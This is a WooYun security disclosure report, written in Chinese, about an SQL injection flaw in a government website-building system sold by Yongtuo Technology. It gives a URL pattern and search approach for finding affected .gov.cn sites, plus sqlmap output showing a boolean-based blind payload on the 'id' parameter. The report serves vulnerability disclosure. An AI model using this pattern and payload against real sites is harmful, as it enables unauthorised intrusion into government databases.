漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-080383
漏洞标题:永拓科技某个政府建站系统sql注入漏洞
相关厂商:永拓科技
漏洞作者: 海绵宝宝
提交时间:2014-10-23 16:37
修复时间:2015-01-21 16:38
公开时间:2015-01-21 16:38
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
审核的大大,我又来来,这回有所属厂商了,url格式也一样了。
广州用拓科技所用政府建站系统sql注入漏洞.
详细说明:
百度关键词
url格式为 http://xxx.gov.cn/shownews.asp?id=xx&Bid=xx&Sid=xx
的存在sql注入漏洞.
测试地址
漏洞证明:
数据库类型均为ACCESS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=528 AND 8012=8012
---
[16:52:07] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access
修复方案:
建议该市政府换个靠谱点建站厂商
版权声明:转载请注明来源 海绵宝宝@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝